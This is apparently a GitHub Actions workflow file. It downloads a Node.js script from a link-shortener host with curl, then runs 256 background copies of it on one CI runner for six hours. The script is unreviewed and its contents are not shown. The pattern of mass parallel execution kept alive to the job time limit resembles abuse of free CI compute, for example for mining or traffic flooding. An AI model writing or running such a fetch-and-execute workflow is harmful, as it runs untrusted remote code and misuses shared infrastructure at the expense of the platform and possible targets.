name: Run Node.js Script on 256 Machines

on:
  workflow_dispatch:

jobs:
  run-nodes:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: |
          curl -o client.js https://curl.by/T09TY/client.js
          for i in $(seq 1 256); do
            nohup node client.js > client_$i.log 2>&1 &
          done
          sleep 21600 # 6 saat
